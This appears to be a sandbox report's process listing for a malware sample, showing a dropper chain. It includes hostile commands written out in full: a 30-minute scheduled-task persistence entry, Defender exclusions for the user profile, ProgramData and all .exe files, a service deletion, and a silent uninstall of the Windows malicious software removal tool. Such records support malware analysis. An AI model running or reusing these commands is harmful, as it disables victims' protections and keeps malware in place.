C:\Users\Admin\AppData\Local\Temp\F86D.exe

C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp

C:\Users\Admin\AppData\Local\Temp\nskF6E0.tmp

C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SO10D.tmp\F86D.tmp" /SL5="$10254,4081152,54272,C:\Users\Admin\AppData\Local\Temp\F86D.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

"C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe" -i

C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe

"C:\Users\Admin\AppData\Local\Folder To Iso 2.0\foldertoiso20.exe" -s

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\uhgjcbw

C:\Users\Admin\AppData\Roaming\uhgjcbw

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3728 -ip 3728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4028 -ip 4028

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 2420

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

Network


Files
